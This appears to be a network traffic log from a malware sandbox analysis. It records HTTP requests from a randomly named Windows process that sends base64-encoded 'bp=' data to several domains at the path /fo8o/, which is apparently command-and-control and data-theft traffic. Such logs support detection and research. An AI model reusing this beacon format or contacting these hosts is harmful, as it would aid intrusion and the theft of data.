Jan 6, 2025 14:32:45.702728987 CET	515	OUT	GET /fo8o/?XHI=wJbPZ8pHe&bp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 6, 2025 14:32:46.582382917 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 13:32:46 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	116.50.37.244	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:33:10.138130903 CET	798	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 66 2b 69 68 4b 4e 35 6b 56 6a 42 53 54 58 45 45 48 35 7a 4f 77 6e 61 50 46 49 62 45 35 61 50 52 57 73 55 6b 58 34 3d Data Ascii: bp=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOf+ihKN5kVjBSTXEEH5zOwnaPFIbE5aPRWsUkX4=
Jan 6, 2025 14:33:11.005991936 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 06 Jan 2025 13:33:10 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49710	116.50.37.244	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:33:12.678772926 CET	818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 78 50 47 67 74 42 4f 48 6e 4c 31 38 6b 36 41 73 61 6f 55 78 39 79 59 4e 2b 77 4c 4a 73 72 55 72 4f 70 64 44 34 Data Ascii: bp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPxPGgtBOHnL18k6AsaoUx9yYN+wLJsrUrOpdD4
Jan 6, 2025 14:33:13.569138050 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 06 Jan 2025 13:33:12 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49711	116.50.37.244	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:33:15.209613085 CET	1835	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 57 68 6e 6e 48 47 38 30 47 66 75 47 57 32 34 46 38 33 63 42 75 79 31 41 38 72 51 79 39 4c 70 35 32 41 37 47 76 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 53 49 78 6b 33 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a 4a 78 [TRUNCATED] Data Ascii: bp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZWhnnHG80GfuGW24F83cBuy1A8rQy9Lp52A7GvYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZSIxk3fgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB1wpMYBMRckzt2D/eIJtpT20mt4OA+JQXnrpexn1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7rMVU1cLUAi6eDP91cfrHTUWULSg8QPjipQC0PcC/GCq+YVMXHhXxD5wzig4vxekCYTpVYZipXjiiZIvQaAQFC7hmpC1AbIVYNRRZEb41tWov5AMqRlLiTbWPtjQ9uONwD1KCxGB0412qA4Kbc92OIfsourRmt+pOu57FojipUf+K+41IChjLJy3WG6SaABhRSvFLg5JBBa1I1R+vFj74Pg3XYGN6YoZcsM4v1XQu9a5qUtGMLt9n4kQLanQZosbnFyxGK9PGSROzwxWMGX1iyxA04Xbxtjtqvdvs0G55TeL20KSKniOZ83+UdQoGsYEt1RkWFgAqa3JqQHgOqqwn76jr+RIcVDQhFfXPJqCg+/c5lh2hRsRx8cooQh/BDEWAZ6Ab11kuAT+7TGrH6aNwMlnC6NeZMJCh8jGzl5kXirquVdNiOC6Jgcqo2YKO8gpBClsQEAK34f/fEJ3cr0H35RrLK/aRrUwZ+S+oixHJ1DkdJUrOZIdo0VE64eWxpB3wpbR/tETOU/yknxVEOxv [TRUNCATED]
Jan 6, 2025 14:33:16.071692944 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 06 Jan 2025 13:33:15 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49712	116.50.37.244	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:33:17.740582943 CET	522	OUT	GET /fo8o/?XHI=wJbPZ8pHe&bp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 6, 2025 14:33:18.609178066 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 06 Jan 2025 13:33:17 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49714	85.159.66.93	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:33:31.811745882 CET	777	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6d 4f 72 5a 72 56 62 46 67 71 33 56 78 63 4f 51 38 59 49 74 35 50 32 63 47 44 43 50 6a 33 67 72 48 6b 72 34 47 4d 3d Data Ascii: bp=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0mOrZrVbFgq3VxcOQ8YIt5P2cGDCPj3grHkr4GM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49733	85.159.66.93	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:33:34.350240946 CET	797	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6e 64 63 46 72 30 4b 55 71 49 78 6b 30 62 6d 52 59 7a 6d 53 71 4f 73 32 50 4f 75 4b 73 4d 4d 4a 7a 30 64 67 68 67 Data Ascii: bp=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5ndcFr0KUqIxk0bmRYzmSqOs2POuKsMMJz0dghg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49753	85.159.66.93	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:33:36.884439945 CET	1814	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 37 43 70 51 55 37 78 45 6d 4b 4f 33 48 63 59 76 79 34 6c 69 45 47 48 36 48 62 46 6a 59 4a 63 65 4d 72 2b 51 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 39 38 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 6c 2b [TRUNCATED] Data Ascii: 